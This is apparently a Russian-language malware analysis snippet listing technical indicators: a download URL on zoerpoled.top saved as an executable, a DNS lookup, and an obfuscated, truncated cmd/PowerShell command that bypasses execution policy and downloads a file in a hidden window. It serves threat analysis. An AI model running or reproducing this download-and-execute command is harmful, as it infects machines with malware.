Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oWERsHEL^l.^eXE^ -E^xeCUtioNPo^Li^c^y^ byP^AsS ^-NO^P^RoF^iLe ^-^wiNd^O^w^s^TyLe HID^dEN ^(^NEW-ObJeCt sy^S^t^Em.Ne^t.^w^eB^C^L^Ien^t).dowNlOAD^F^iLE(^'http://www.zoerpoled...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "P^oWERsHEL^l.^eXE^ -E^xeCUtioNPo^Li^c^y^ byP^AsS ^-NO^P^RoF^iLe ^-^wiNd^O^w^s^TyLe HID^dEN ^(^NEW-ObJeCt sy^S^t^Em.Ne^t.^w^eB^C^L^Ien^t).dowNlOAD^F^iLE(^'http://www.zoerpoled...' (со скрытым окном)